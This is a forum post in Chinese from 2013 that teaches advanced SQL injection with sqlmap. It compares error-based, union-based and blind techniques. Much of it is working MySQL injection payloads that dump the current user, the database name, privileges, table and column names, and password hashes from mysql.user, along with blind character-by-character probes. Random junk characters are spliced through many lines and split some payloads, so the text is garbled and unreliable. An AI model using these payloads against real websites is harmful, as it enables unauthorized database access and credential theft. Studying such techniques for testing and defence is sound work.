找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2219|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
2 F# D3 `* q+ H6 ~% p# \. G( \
8 G! f" N/ s* n3 H1 _& a. x  Q% w这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
( @% @! ~7 F8 [2 K- h ' b1 ~& p' e. o, H% Q
分类标准        分类        备注" a" S( t1 u( Z, q) B
按字段类型        整型注入,字符型注入        9 U0 s! D7 z" T3 t6 R
按出现的位置        get注入,post注入,cookie注入,http header注入       
4 L& x1 ]3 p7 o! R然而高级注入是这样的) \( }6 _( l' R! v
) ?* ?5 x$ s4 @3 a
高级注入分类        条件
6 L. d4 E" p( Y5 G. J8 Gerror-based sql        数据库的错误回显可以返回,存在数据库,表结构
" D6 s; S( \, s, |union-based sql        能够使用union,存在数据库,表结构6 s1 G7 d8 l( d; U# N- Q
blind sql        存在注入- `  ~' g7 b4 a! |5 w
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
8 S7 S4 L* A0 N. u
6 z* z! a" q8 w" u# @, ^1 P9 W6 \好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火+ `4 B: ~1 C9 _5 K' r+ O

: k# k1 q7 P' @# `/ ]附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。3 V2 i, A% _  y1 L
+ t6 K& @8 R& B) @+ K
这里用mysql说明
, d8 o" p! S1 i ' j( g) P3 N# x' }3 b" ~% K6 Y9 j
e注入坛子里很多了,请看戳我或者再戳我
) c3 l% _! b9 K: L  d
# L6 A5 M. L, B0 U3 H% `! Au注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的% e/ a$ S' |  I! P1 y
  l6 C' o# Z- N3 f
获取当前数据库用户名
- O3 W6 X7 F# L/ A' h
5 X3 B+ S0 L7 r* J5 f8 _5 dUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C. j5 l- j0 t  j4 u% U6 m, B
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL: w; [' G; }$ }1 P. |6 G( I
L, NULL#  k: |' M' f, U% }
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。9 H( Z* R& \+ D7 s! l4 s' j4 Q
! b! l/ ]8 v7 V; u. G% l
获取数据库名) j, T2 |3 O' P' k6 C" K5 i

. ^* h6 `$ g6 j+ F/ d9 ZUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
" \6 h3 }& s- c+ V- F" ^/ u2 x获取所有用户名
1 ]3 f6 v7 w, c
( ]; e2 Q7 y1 Z( GUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#) @8 i6 U/ X+ W3 Y' h) c' E
查看当前用户权限
8 B- h1 J  q6 W/ ]' d4 { " z! E3 i& R" n) n8 |& \
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
3 K* x, ^' k. d, O% Z- i% C7 S2 n尝试获取密码,当然需要有能读mysql数据库的权限
+ _$ E3 c$ w9 R$ F
, S* d$ C: ?3 `0 Q( [9 Z' S" iUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
. h1 p$ w; f! e9 a4 a) `获取表名,limit什么的自己搞啦
* X1 {- a* J% n4 d  y- p: q' D
+ H1 |- `  c( ?7 q* f( d' `3 _UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
5 U  d; E7 }2 B, E获取字段名及其类型' Y, u9 l' Z( J9 P$ G' s
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
9 q7 k; d9 W( V% _! C
( E, ]  ^. c' x% g* db注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
; p+ d) v8 m7 l) } 3 s0 D" n9 f" {
如:
& R- s4 k/ g' G3 ?6 T获取当前用户名
- H: f2 d5 g! y4 j, W4 G, {+ e 2 b  F( D4 d( {  [  J3 o/ l
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
  {; p* f" p8 P- C- ?2 `# {获取当前数据库
0 X  U- t& I* i6 { 4 P- i+ e. E; I$ a! H, y8 n
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106+ n: p6 S5 f! g9 g4 c6 n1 U' r: D
获取表名
2 o, n; }. i$ a+ K5 Z ' S( \* k! H4 ~4 @( b# B' c$ l! O$ E
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 511 T+ O! u' F# b& N7 K
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。$ r# b9 ~+ V7 T, Z7 B3 u! W
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。9 A, y7 O" j6 |! \+ d, `
爆表/ \! y  j" b( g
" I7 Q8 A4 L0 \
AND EXISTS(select * from table)9 q9 b0 i! a" D7 `( r  j+ @
爆字段/ m- e# a  S7 i2 |1 q
+ T- v% {7 W( Z
AND EXISTS(select pwd from table)
+ T. b5 }# Q6 s8 f2 h盲注的变化就比较多了,由于篇幅,只是举个例子而已。( r/ N$ q. _' Q& Q2 C  b9 m" `

/ n+ ]- ^6 x! A. @7 Y3 e3 ~本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
% t! b& Q) r/ V8 ]- H$ \$ K2 {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表